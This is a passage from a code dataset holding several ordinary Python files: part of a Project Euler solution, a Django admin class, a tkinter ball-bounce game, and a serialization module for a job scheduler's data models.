in xrange(1, phi, 2) if gcd(e, phi) == 1)\n\n# Section 3: building a dict of # unconcealed messages\nn_unc = {}\nfor e in es:\n u = (1 + gcd(e - 1, pm1)) * (1 + gcd(e - 1, qm1))\n if u in n_unc:\n n_unc[u].append(e)\n else:\n n_unc[u] = [e]\n\n# Section 4: printing sum of es that give min # unc. 
messages\nm = min(n_unc.iterkeys())\nprint(sum(n_unc[m]))\nprint(time() - start)\n","repo_name":"genos/online_problems","sub_path":"euler/previous/euler182.py","file_name":"euler182.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"73383185237","text":"from django.contrib import admin\nfrom django.contrib.admin.utils import get_deleted_objects\nfrom django.db import router\nfrom django import forms\nfrom idgo_admin.models import License\n\n\nclass LicenseAdminForm(forms.ModelForm):\n\n class Meta(object):\n model = License\n fields = '__all__'\n widgets = {\n 'alternate_titles': forms.Textarea(),\n 'alternate_urls': forms.Textarea(),\n }\n\n\nclass LicenseAdmin(admin.ModelAdmin):\n form = LicenseAdminForm\n list_display = ('title', 'alternate_titles',)\n ordering = ('title',)\n\n def get_actions(self, request):\n actions = super().get_actions(request)\n if 'delete_selected' in actions:\n del actions['delete_selected']\n return actions\n\n def has_delete_permission(self, request, obj=None):\n if obj:\n # Ici on récupere brutalement les objets suscebtibles d'etre supprimés\n # si on aurai supprimé l'instance courante\n opts = self.model._meta\n using = router.db_for_write(self.model)\n (deleted_objects, model_count, perms_needed, protected) = get_deleted_objects(\n [obj], opts, request.user, self.admin_site, using)\n # Si on ne retrouve uniquement que l'instance courante parmis\n # les objets a supprimés alors on autorise.\n if len(deleted_objects) == 1:\n return True\n\n return False\n\n\nadmin.site.register(License, LicenseAdmin)\n","repo_name":"DataSud/DataSud-2017-2019","sub_path":"idgo_admin/admin/license.py","file_name":"license.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"39132540424","text":"from tkinter import*\nimport time\nimport random\n\nroot = Tk()\n\nroot.title(\"bounce!\")\nroot.resizable(0, 0)\nroot.wm_attributes(\"-topmost\", 1)\n\ncanvas = Canvas(root, width = 500, height = 500, bd = 0, bg = 'black', highlightthickness = 0)\ncanvas.pack()\n\nroot.update()\n\nglobal counter\ncounter = 0\n\nglobal count\ncount = 0\n\nclass Ball:\n def __init__(self, canvas, paddle, color, obs):\n self.canvas = canvas\n self.paddle = paddle\n self.obs = obs\n self.id = canvas.create_oval(10, 10, 25, 25, fill = color)\n self.canvas.move(self.id, 250, 200)\n\n start = [-3, -2, -1, 1, 2, 3]\n random.shuffle(start)\n self.x = -1\n self.y = start[0]\n self.canvas_height = self.canvas.winfo_height()\n self.canvas_width = self.canvas.winfo_width()\n\n def hitPaddle(self, pos):\n paddle_pos = self.canvas.coords(self.paddle.id)\n\n if pos[2] >= paddle_pos[0] and pos[0] <= paddle_pos[2]:\n if pos[3] >= paddle_pos[1] and pos[1] <= paddle_pos[3]:\n return True\n return False\n\n\n def hitobs(self, pos, speed):\n global counter\n \n if(len(obs) == 0):\n canvas.create_text(250, 250, text = \"YOU WON\", fill = 'red')\n counter = counter + 1\n \n for i in range(len(obs)):\n obs_pos = self.canvas.coords(self.obs[i].id)\n\n if pos[2] >= obs_pos[0] and pos[0] <= obs_pos[2]:\n if pos[3] >= obs_pos[1] and pos[1] <= obs_pos[3]:\n\n self.canvas.delete(self.obs[i].id)\n self.obs.remove(self.obs[i])\n\n self.y = speed[0]\n\n return True\n return False\n\n def draw(self):\n global counter\n self.canvas.move(self.id, self.x, self.y)\n pos = self.canvas.coords(self.id)\n speed = [3, 4]\n 
random.shuffle(speed)\n\n if pos[0] <= 0:\n self.x = speed[0]\n if pos[2] >= self.canvas_width:\n self.x = -speed[0]\n\n if pos[1] <= 0:\n self.y = speed[0]\n if pos[3] >= self.canvas_height:\n canvas.create_text(250, 50, text = \"GAME OVER\", fill = 'red')\n counter = counter+1\n\n if self.hitPaddle(pos) == True:\n self.y = -speed[0]\n\n self.hitobs(pos, speed)\n \n\nclass Obs:\n def __init__(self, canvas, color, x, y):\n self.canvas = canvas\n self.id = canvas.create_rectangle(0, 0, 37, 37, fill = color)\n self.canvas.move(self.id, x, y)\n\nclass Paddle:\n def __init__(self, canvas, color):\n self.canvas = canvas\n self.id = canvas.create_rectangle(0, 0, 100, 10, fill = color)\n self.canvas.move(self.id, 250, 490)\n self.x = 0\n self.canvas_width = self.canvas.winfo_width()\n self.canvas.focus_set()\n self.canvas.bind_all('', self.turnLeft)\n self.canvas.bind_all('', self.turnRight)\n\n def turnLeft(self, event):\n paddle_pos = self.canvas.coords(self.id)\n if paddle_pos[0] <= 0:\n self.x = 0\n else:\n self.x = -6\n self.canvas.move(self.id, self.x, 0)\n def turnRight(self, event):\n paddle_pos = self.canvas.coords(self.id)\n if paddle_pos[2] >= self.canvas_width:\n self.x = 0\n else:\n self.x = 6\n self.canvas.move(self.id, self.x, 0)\n\npaddle = Paddle(canvas, \"white\")\n\nCOLOR = [\"PeachPuff3\", \"dark slate gray\", \"rosy brown\", \"light goldenrod yellow\", \"turquoise3\", \"salmon\",\n \"light steel blue\", \"dark khaki\", \"pale violet red\", \"orchid\", \"tan\", \"MistyRose2\",\n \"DodgerBlue4\", \"wheat2\", \"RosyBrown2\", \"bisque3\", \"DarkSeaGreen1\"]\nb = []\nfor i in range(0, 3):\n\n for j in range(0, 12):\n random.shuffle(COLOR)\n tmp = Obs(canvas, COLOR[0], (50 * j) + 10, (50 * i))\n b.append(tmp)\n\n\nobs = b\nball = Ball(canvas, paddle, \"red\", obs)\nwhile(1):\n ball.draw()\n root.update()\n root.update_idletasks()\n time.sleep(0.01)\n if(counter>0):\n break\n\nroot.mainloop()\n","repo_name":"jasmeenlongia/ball_bounce_game","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"6080004868","text":"import dataclasses\nimport inspect\nimport sys\nfrom abc import ABC, abstractmethod\nfrom dataclasses import dataclass\nfrom datetime import datetime\nfrom typing import Any, Callable, Dict, NamedTuple, Type, TypeVar\nfrom uuid import UUID, uuid4\n\nfrom orjson import orjson\n\nimport utils\nfrom utils import datetime_now_utc\n\nT = TypeVar('T', UUID, float, int, str, bool)\n\n_factory_list = list\n_factory_datetime = datetime_now_utc\n_factory_uuid = uuid4\n\n_classes_str2cls: Dict[str, type] = dict()\n_classes_cls2str: Dict[type, str] = dict()\n_field_names_camel2snake: Dict[type, Dict[str, str]] = dict()\n_field_names_snake2camel: Dict[type, Dict[str, str]] = dict()\n\n\n\n\ndef _orjson_dumps(v, *, default):\n # orjson.dumps returns bytes, to match standard json.dumps we need to decode\n return orjson.dumps(v, default=default).decode()\n\n\nclass DatabaseRow(NamedTuple):\n id: UUID\n ver: int\n parent_id: UUID | None\n type: str\n data: str\n\n\nclass SerializerWriter(ABC):\n\n @classmethod\n @abstractmethod\n def create_writer(cls, type: type):\n raise NotImplementedError\n\n @abstractmethod\n def export_row(self, name: str, value: str | None) -> DatabaseRow:\n raise NotImplementedError\n\n @abstractmethod\n def set_id(self, value: UUID):\n raise NotImplementedError\n\n @abstractmethod\n def set_parent_id_optional(self, value: UUID 
| None):\n raise NotImplementedError\n\n def set_parent(self, value: UUID):\n if value is None: raise ValueError(\"parent_id cannot be None\")\n self.set_parent_id_optional(value)\n\n @abstractmethod\n def set_uuid_optional(self, name: str, value: UUID | None):\n raise NotImplementedError\n\n def set_uuid(self, name: str, value: UUID | None):\n if value is None: raise ValueError(f\"{name} cannot be None\")\n self.set_uuid_optional(name, value)\n\n @abstractmethod\n def set_int_optional(self, name: str, value: int | None):\n raise NotImplementedError\n\n def set_int(self, name: str, value: int | None):\n if value is None: raise ValueError(f\"{name} cannot be None\")\n self.set_int_optional(name, value)\n\n @abstractmethod\n def set_float_optional(self, name: str, value: float | None):\n raise NotImplementedError\n\n def set_float(self, name: str, value: float | None):\n if value is None: raise ValueError(f\"{name} cannot be None\")\n self.set_float_optional(name, value)\n\n @abstractmethod\n def set_bool_optional(self, name: str, value: bool | None):\n raise NotImplementedError\n\n def set_bool(self, name: str, value: bool | None):\n if value is None: raise ValueError(f\"{name} cannot be None\")\n self.set_bool_optional(name, value)\n\n @abstractmethod\n def set_str_optional(self, name: str, value: str | None):\n raise NotImplementedError\n\n def set_str(self, name: str, value: str | None):\n if value is None: raise ValueError(f\"{name} cannot be None\")\n self.set_str_optional(name, value)\n\n @abstractmethod\n def set_datetime_optional(self, name: str, value: datetime | None):\n raise NotImplementedError\n\n def set_datetime(self, name: str, value: datetime | None):\n if value is None: raise ValueError(f\"{name} cannot be None\")\n self.set_datetime_optional(name, value)\n\n\nclass SerializerWriterJson(SerializerWriter):\n __slots__ = {\n \"_v_type\": \"The class being written for\",\n \"_v_id\": \"The UUID id value\",\n \"_v_parent_id\": \"The Optional[UUID] parent id value\",\n \"_v_data\": \"The Dict[str, Any | None] containing the data\",\n }\n\n _v_type: type\n _v_id: UUID\n _v_parent_id: UUID | None\n _v_data: Dict[str, Any | None]\n\n @classmethod\n def create_writer(cls, type: type):\n o = cls()\n o._v_type = type\n o._v_id = None\n o._v_parent_id = None\n o._v_data = dict()\n return o\n\n def export_row(self, name: str, value: str | None) -> DatabaseRow:\n if self._v_id is None: raise ValueError(\"id not assigned\")\n # data = orjson.dumps(self.v_data, default=default).decode()\n data = orjson.dumps(self._v_data, option=orjson.OPT_NAIVE_UTC).decode()\n return DatabaseRow(self._v_id, 1, self._v_parent_id, _classes_cls2str[self._v_type], data)\n\n def set_id(self, value: UUID):\n self._v_id = value\n\n def set_parent_id_optional(self, value: UUID | None):\n self._v_parent_id = value\n\n def set_uuid_optional(self, name: str, value: UUID | None):\n if value is None: return # do not write None\n self._v_data[_field_names_snake2camel[self._v_type][name]] = value\n\n def set_int_optional(self, name: str, value: int | None):\n if value is None: return # do not write None\n self._v_data[_field_names_snake2camel[self._v_type][name]] = value\n\n def set_float_optional(self, name: str, value: float | None):\n if value is None: return # do not write None\n self._v_data[_field_names_snake2camel[self._v_type][name]] = value\n\n def set_bool_optional(self, name: str, value: bool | None):\n if value is None: return # do not write None\n self._v_data[_field_names_snake2camel[self._v_type][name]] 
= value\n\n def set_str_optional(self, name: str, value: str | None):\n if value is None: return # do not write None\n self._v_data[_field_names_snake2camel[self._v_type][name]] = value\n\n def set_datetime_optional(self, name: str, value: datetime | None):\n if value is None: return # do not write None\n self._v_data[_field_names_snake2camel[self._v_type][name]] = value\n\n\nclass SerializerReader(ABC):\n @classmethod\n @abstractmethod\n def create_reader(cls, row: DatabaseRow):\n raise NotImplementedError\n\n @abstractmethod\n def get_id(self) -> UUID:\n raise NotImplementedError\n\n @abstractmethod\n def get_parent_id_optional(self) -> UUID | None:\n raise NotImplementedError\n\n def get_parent_id(self) -> UUID:\n v = self.get_parent_id_optional()\n if v is None: raise ValueError(\"parent_id cannot be None\")\n return v\n\n @abstractmethod\n def get_uuid_optional(self, name: str) -> UUID | None:\n raise NotImplementedError\n\n def get_uuid(self, name: str) -> UUID:\n v = self.get_uuid_optional(name)\n if v is None: raise ValueError(f\"{name} cannot be None\")\n return v\n\n @abstractmethod\n def get_int_optional(self, name: str) -> int | None:\n raise NotImplementedError\n\n def get_int(self, name: str) -> int:\n v = self.get_int_optional(name)\n if v is None: raise ValueError(f\"{name} cannot be None\")\n return v\n\n @abstractmethod\n def get_float_optional(self, name: str) -> float | None:\n raise NotImplementedError\n\n def get_float(self, name: str) -> float:\n v = self.get_float_optional(name)\n if v is None: raise ValueError(f\"{name} cannot be None\")\n return v\n\n @abstractmethod\n def get_bool_optional(self, name: str) -> bool | None:\n raise NotImplementedError\n\n def get_bool(self, name: str) -> bool:\n v = self.get_bool_optional(name)\n if v is None: raise ValueError(f\"{name} cannot be None\")\n return v\n\n @abstractmethod\n def get_str_optional(self, name: str) -> str | None:\n raise NotImplementedError\n\n def get_str(self, name: str) -> str:\n v = self.get_str_optional(name)\n if v is None: raise ValueError(f\"{name} cannot be None\")\n return v\n\n @abstractmethod\n def get_datetime_optional(self, name: str) -> datetime | None:\n raise NotImplementedError\n\n def get_datetime(self, name: str) -> datetime:\n v = self.get_datetime_optional(name)\n if v is None: raise ValueError(f\"{name} cannot be None\")\n return v\n\n\nclass SerializerReaderJson(SerializerReader):\n __slots__ = {\n \"_v_type\": \"The class being read for\",\n \"_v_id\": \"The UUID id value\",\n \"_v_parent_id\": \"The Optional[UUID] parent id value\",\n \"_v_data\": \"The Dict[str, Any | None] containing the data\",\n }\n\n _v_type: type\n _v_id: UUID\n _v_parent_id: UUID | None\n _v_data: Dict[str, Any | None]\n\n @classmethod\n def create_reader(cls, row: DatabaseRow):\n o = cls()\n o._v_type = _classes_str2cls[row.type]\n o._v_id = row.id\n o._v_parent_id = row.parent_id\n o._v_data = orjson.loads(row.data)\n return o\n\n def get_id(self) -> UUID:\n return self._v_id\n\n def get_parent_id_optional(self) -> UUID | None:\n return self._v_parent_id\n\n def _get_value(self, name: str):\n v = self._v_data.get(_field_names_camel2snake[self._v_type][name])\n if v is not None: return v\n return self._v_data.get(name) # just in case was written snake rather then camel\n\n def _get_value_parsed(self, name: str, type: type, type_factory: Callable = None, expected_len=None):\n v = self._get_value(name)\n if v is None: return None\n if isinstance(v, type): return v\n if not isinstance(v, str): v = str(v)\n if 
v is None: return None\n if isinstance(v, type): return v # for str type\n if len(v) == 0: return None\n if type_factory is None: type_factory = type\n if expected_len is not None and len(v) == expected_len: return type_factory(v) # for UUID type\n v = utils.trim(v)\n if v is None: return None\n return type_factory(v)\n\n def get_uuid_optional(self, name: str) -> UUID | None:\n return self._get_value_parsed(name, UUID, expected_len=36)\n\n def get_int_optional(self, name: str) -> int | None:\n return self._get_value_parsed(name, int)\n\n def get_float_optional(self, name: str) -> float | None:\n return self._get_value_parsed(name, float)\n\n def get_bool_optional(self, name: str) -> bool | None:\n return self._get_value_parsed(name, bool, type_factory=utils.bool_parse_none)\n\n def get_str_optional(self, name: str) -> str | None:\n return self._get_value_parsed(name, str)\n\n def get_datetime_optional(self, name: str) -> datetime | None:\n return self._get_value_parsed(name, datetime, type_factory=utils.datetime_parse_none)\n\n\nserialization_reader: Type[SerializerReader] = SerializerReaderJson\nserialization_writer: Type[SerializerWriter] = SerializerWriterJson\n\n\n@dataclass(slots=True)\nclass DatabaseObject:\n id: UUID\n\n\n\n\n\n@dataclass(slots=True)\nclass System(DatabaseObject):\n name: str\n\n @classmethod\n def create(cls, name: str):\n return cls(\n id=_factory_uuid(),\n name=name,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n name=r.get_str(\"name\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.id)\n w.set_str(\"name\", self.name)\n\n\nSYSTEM_CONFIG_ITEM_APP_SYSTEM = \"SYSTEM\".casefold()\nSYSTEM_CONFIG_ITEM_APP_WEB = \"WEB\".casefold()\nSYSTEM_CONFIG_ITEM_APP_SCHEDULER = \"SCHEDULER\".casefold()\nSYSTEM_CONFIG_ITEM_APP_EXECUTOR = \"EXECUTOR\".casefold()\n\n\n@dataclass(slots=True)\nclass SystemConfigItem(DatabaseObject):\n system_id: UUID\n app: str\n name: str\n value: str | None\n\n @classmethod\n def create(cls, system_id: UUID, app: str, name: str, value: str):\n return cls(\n id=_factory_uuid(),\n system_id=system_id,\n app=app,\n name=name,\n value=value,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n system_id=r.get_parent_id(),\n app=r.get_str(\"app\"),\n name=r.get_str(\"name\"),\n value=r.get_str_optional(\"value\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.system_id)\n w.set_str(\"app\", self.app)\n w.set_str(\"name\", self.name)\n w.set_str_optional(\"value\", self.value)\n\n\n@dataclass(slots=True)\nclass SystemActionConfigItem(DatabaseObject):\n system_id: UUID\n action: str\n name: str\n value: str\n\n @classmethod\n def create(cls, system_id: UUID, action: str, name: str, value: str):\n return cls(\n id=_factory_uuid(),\n system_id=system_id,\n action=action,\n name=name,\n value=value,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n system_id=r.get_parent_id(),\n action=r.get_str(\"action\"),\n name=r.get_str(\"name\"),\n value=r.get_str(\"value\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.system_id)\n w.set_str(\"action\", self.action)\n w.set_str(\"name\", self.name)\n w.set_str(\"value\", self.value)\n\n\ndef dostuff():\n dcs = utils.dataclass_infos_in_module(__name__)\n print(f\"Found {len(dcs)} dataclasses\")\n #raise ValueError(f\"{_f.name} has invalid 
types\")\n\n for dc in dcs:\n for f in dc.fields.values():\n if len(f.type.subtypes) > 0: raise ValueError(f\"{dc.name}.{f.name} has invalid types\")\n\n@dataclass(slots=True)\nclass User(DatabaseObject):\n system_id: UUID\n is_active: bool\n username: str\n password: str\n is_admin: bool\n email: str | None\n\n @classmethod\n def create(cls, system_id: UUID, username: str, password: str):\n return cls(\n id=_factory_uuid(),\n system_id=system_id,\n is_active=True,\n username=username,\n password=password,\n is_admin=False,\n email=None,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n system_id=r.get_parent_id(),\n is_active=r.get_bool(\"is_active\"),\n username=r.get_str(\"username\"),\n password=r.get_str(\"password\"),\n is_admin=r.get_bool(\"is_admin\"),\n email=r.get_str_optional(\"email\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.system_id)\n w.set_bool(\"is_active\", self.is_active)\n w.set_str(\"username\", self.username)\n w.set_str(\"password\", self.password)\n w.set_bool(\"is_admin\", self.is_admin)\n w.set_str_optional(\"email\", self.email)\n\n\n@dataclass(slots=True)\nclass Job(DatabaseObject):\n system_id: UUID\n is_active: bool\n name: str\n\n @classmethod\n def create(cls, system_id: UUID, name: str):\n return cls(\n id=_factory_uuid(),\n system_id=system_id,\n is_active=True,\n name=name,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n system_id=r.get_parent_id(),\n is_active=r.get_bool(\"is_active\"),\n name=r.get_str(\"name\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.system_id)\n w.set_bool(\"is_active\", self.is_active)\n w.set_str(\"name\", self.name)\n\n\n@dataclass(slots=True)\nclass JobTag(DatabaseObject):\n job_id: UUID\n name: str\n value: str\n\n @classmethod\n def create(cls, job_id: UUID, name: str, value: str):\n return cls(\n id=_factory_uuid(),\n job_id=job_id,\n name=name,\n value=value,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n job_id=r.get_parent_id(),\n name=r.get_str(\"name\"),\n value=r.get_str(\"value\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.job_id)\n w.set_str(\"name\", self.name)\n w.set_str(\"value\", self.value)\n\n\n@dataclass(slots=True)\nclass JobSchedule(DatabaseObject):\n job_id: UUID\n is_active: bool\n cron: str\n\n @classmethod\n def create(cls, job_id: UUID, cron: str):\n return cls(\n id=_factory_uuid(),\n job_id=job_id,\n is_active=True,\n cron=cron,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n job_id=r.get_parent_id(),\n is_active=r.get_bool(\"is_active\"),\n cron=r.get_str(\"cron\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.job_id)\n w.set_bool(\"is_active\", self.is_active)\n w.set_str(\"cron\", self.cron)\n\n\n@dataclass(slots=True)\nclass JobActionConfigItem(DatabaseObject):\n job_id: UUID\n action: str\n name: str\n value: str | None\n\n @classmethod\n def create(cls, job_id: UUID, action: str, name: str, value: str | None):\n return cls(\n id=_factory_uuid(),\n job_id=job_id,\n action=action,\n name=name,\n value=value,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n job_id=r.get_parent_id(),\n action=r.get_str(\"action\"),\n name=r.get_str(\"name\"),\n 
value=r.get_str_optional(\"value\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.job_id)\n w.set_str(\"action\", self.action)\n w.set_str(\"name\", self.name)\n w.set_str_optional(\"value\", self.value)\n\n\n@dataclass(slots=True)\nclass Task(DatabaseObject):\n job_id: UUID\n is_active: bool\n step: int\n action: str\n\n @classmethod\n def create(cls, job_id: UUID, action: str):\n return cls(\n id=_factory_uuid(),\n job_id=job_id,\n is_active=True,\n step=-1,\n action=action,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n job_id=r.get_parent_id(),\n is_active=r.get_bool(\"is_active\"),\n step=r.get_int(\"step\"),\n action=r.get_str(\"action\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.job_id)\n w.set_bool(\"is_active\", self.is_active)\n w.set_int(\"step\", self.step)\n w.set_str(\"action\", self.action)\n\n\n@dataclass(slots=True)\nclass TaskActionConfigItem(DatabaseObject):\n task_id: UUID\n action: str\n name: str\n value: str | None\n\n @classmethod\n def create(cls, task_id: UUID, action: str, name: str, value: str | None):\n return cls(\n id=_factory_uuid(),\n task_id=task_id,\n action=action,\n name=name,\n value=value,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n task_id=r.get_parent_id(),\n action=r.get_str(\"action\"),\n name=r.get_str(\"name\"),\n value=r.get_str_optional(\"value\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.task_id)\n w.set_str(\"action\", self.action)\n w.set_str(\"name\", self.name)\n w.set_str_optional(\"value\", self.value)\n\n\n@dataclass(slots=True)\nclass TriggerEvent(DatabaseObject):\n job_id: UUID\n triggered_on: datetime\n triggered_by_job_schedule_id: UUID | None\n triggered_by_user_id: UUID | None\n\n @classmethod\n def create(cls, job_id: UUID, triggered_by_job_schedule_id: UUID | None = None, triggered_by_user_id: UUID | None = None):\n if triggered_by_job_schedule_id is None and triggered_by_user_id is None:\n raise ValueError(\"values 'triggered_by_job_schedule_id' and 'triggered_by_user_id' cannot both be None\")\n now = _factory_datetime()\n return cls(\n id=_factory_uuid(),\n job_id=job_id,\n triggered_on=now,\n triggered_by_job_schedule_id=triggered_by_job_schedule_id,\n triggered_by_user_id=triggered_by_user_id,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n o = cls(\n id=r.get_id(),\n job_id=r.get_parent_id(),\n triggered_on=r.get_datetime(\"triggered_on\"),\n triggered_by_job_schedule_id=r.get_uuid_optional(\"triggered_by_job_schedule_id\"),\n triggered_by_user_id=r.get_uuid_optional(\"triggered_by_user_id\"),\n )\n if o.triggered_by_job_schedule_id is None and o.triggered_by_user_id is None:\n raise ValueError(\"values 'triggered_by_job_schedule_id' and 'triggered_by_user_id' cannot both be None\")\n return o\n\n def serialize(self, w: SerializerWriter):\n if self.triggered_by_job_schedule_id is None and self.triggered_by_user_id is None:\n raise ValueError(\"values 'triggered_by_job_schedule_id' and 'triggered_by_user_id' cannot both be None\")\n w.set_id(self.id)\n w.set_parent(self.job_id)\n w.set_datetime(\"triggered_on\", self.triggered_on)\n w.set_uuid_optional(\"triggered_by_job_schedule_id\", self.triggered_by_job_schedule_id)\n w.set_uuid_optional(\"triggered_by_user_id\", self.triggered_by_user_id)\n\n\n@dataclass(slots=True)\nclass 
CancellationEvent(DatabaseObject):\n execution_id: UUID\n cancelled_on: datetime\n cancelled_by_user_id: UUID\n\n @classmethod\n def create(cls, execution_id: UUID, cancelled_by_user_id: UUID):\n now = _factory_datetime()\n return cls(\n id=_factory_uuid(),\n execution_id=execution_id,\n cancelled_on=now,\n cancelled_by_user_id=cancelled_by_user_id,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n execution_id=r.get_parent_id(),\n cancelled_on=r.get_datetime(\"cancelled_on\"),\n cancelled_by_user_id=r.get_uuid(\"cancelled_by_user_id\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.execution_id)\n w.set_datetime(\"cancelled_on\", self.cancelled_on)\n w.set_uuid(\"cancelled_by_user_id\", self.cancelled_by_user_id)\n\n\nEXECUTION_STATE_TRIGGERED = \"TRIGGERED\".casefold()\nEXECUTION_STATE_QUEUED = \"QUEUED\".casefold()\nEXECUTION_STATE_STARTED = \"STARTED\".casefold()\nEXECUTION_STATE_COMPLETED = \"COMPLETED\".casefold()\nEXECUTION_STATE_CANCELLED = \"CANCELLED\".casefold()\nEXECUTION_STATE_ERROR = \"ERROR\".casefold()\n\n\n@dataclass(slots=True)\nclass Execution(DatabaseObject):\n system_id: UUID\n trigger_event_id: UUID\n state: str\n executing_task_id: UUID | None\n started_on: datetime | None\n completed_on: datetime | None\n cancellation_event_id: UUID | None\n error_serialized: str | None\n job_serialized: str\n execution_server_thread_id: UUID | None = None\n\n @classmethod\n def create(cls, system_id: UUID, trigger_event_id: UUID, job_serialized: str):\n return cls(\n id=_factory_uuid(),\n system_id=system_id,\n trigger_event_id=trigger_event_id,\n state=EXECUTION_STATE_TRIGGERED,\n executing_task_id=None,\n started_on=None,\n completed_on=None,\n cancellation_event_id=None,\n error_serialized=None,\n job_serialized=job_serialized,\n execution_server_thread_id=None,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n system_id=r.get_parent_id(),\n trigger_event_id=r.get_uuid(\"trigger_event_id\"),\n state=r.get_str(\"state\"),\n executing_task_id=r.get_uuid_optional(\"executing_task_id\"),\n started_on=r.get_datetime_optional(\"started_on\"),\n completed_on=r.get_datetime_optional(\"completed_on\"),\n cancellation_event_id=r.get_uuid_optional(\"cancellation_event_id\"),\n error_serialized=r.get_str_optional(\"error_serialized\"),\n job_serialized=r.get_str_optional(\"job_serialized\"),\n execution_server_thread_id=r.get_uuid_optional(\"execution_server_thread_id\")\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.system_id)\n w.set_uuid_optional(\"trigger_event_id\", self.trigger_event_id)\n w.set_str(\"state\", self.state)\n w.set_uuid_optional(\"executing_task_id\", self.executing_task_id)\n w.set_datetime_optional(\"started_on\", self.started_on)\n w.set_datetime_optional(\"completed_on\", self.completed_on)\n w.set_uuid_optional(\"cancellation_event_id\", self.cancellation_event_id)\n w.set_str_optional(\"error_serialized\", self.error_serialized)\n w.set_str_optional(\"job_serialized\", self.job_serialized)\n w.set_uuid_optional(\"execution_server_thread_id\", self.execution_server_thread_id)\n\n\n@dataclass(slots=True)\nclass ExecutionServer(DatabaseObject):\n system_id: UUID\n started_on: datetime\n heartbeat_on: datetime\n\n @classmethod\n def create(cls, system_id: UUID):\n now = _factory_datetime()\n return cls(\n id=_factory_uuid(),\n system_id=system_id,\n started_on=now,\n heartbeat_on=now,\n 
)\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n system_id=r.get_parent_id(),\n started_on=r.get_datetime(\"started_on\"),\n heartbeat_on=r.get_datetime(\"heartbeat_on\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.system_id)\n w.set_datetime(\"started_on\", self.started_on)\n w.set_datetime(\"heartbeat_on\", self.heartbeat_on)\n\n\n@dataclass(slots=True)\nclass ExecutionServerThread(DatabaseObject):\n execution_server_id: UUID\n started_on: datetime\n heartbeat_on: datetime\n execution_id: UUID | None\n\n @classmethod\n def create(cls, execution_server_id: UUID):\n now = _factory_datetime()\n return cls(\n id=_factory_uuid(),\n execution_server_id=execution_server_id,\n started_on=now,\n heartbeat_on=now,\n execution_id=None,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n execution_server_id=r.get_parent_id(),\n started_on=r.get_datetime(\"started_on\"),\n heartbeat_on=r.get_datetime(\"heartbeat_on\"),\n execution_id=r.get_uuid_optional(\"execution_id\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.execution_server_id)\n w.set_datetime(\"started_on\", self.started_on)\n w.set_datetime(\"heartbeat_on\", self.heartbeat_on)\n w.set_uuid_optional(\"execution_id\", self.execution_id)\n\n\ndef _field_names_populate():\n _classes_str2cls.clear()\n _classes_cls2str.clear()\n _field_names_camel2snake.clear()\n _field_names_snake2camel.clear()\n\n def is_dataclass_item(member):\n if member is None: return False\n if not inspect.isclass(member): return False\n if member.__module__ != __name__: return False\n if \"id\" not in dir(member): return False\n\n def contains_dataclass(member_names):\n for member_name in member_names:\n if \"_dataclass_\".casefold() in member_name.casefold():\n return True\n return False\n\n if not contains_dataclass(dir(member)): return False\n return True\n\n for tpl in inspect.getmembers(sys.modules[__name__], is_dataclass_item):\n cls = tpl[1]\n _classes_str2cls[cls.__name__] = cls\n _classes_cls2str[cls] = cls.__name__\n\n for f in dataclasses.fields(cls):\n snake_name = f.name\n camel_name = utils.str2camel(snake_name)\n ds = _field_names_snake2camel.get(cls)\n if ds is None:\n ds = dict()\n _field_names_snake2camel[cls] = ds\n ds[snake_name] = camel_name\n\n dc = _field_names_camel2snake.get(cls)\n if dc is None:\n dc = dict()\n 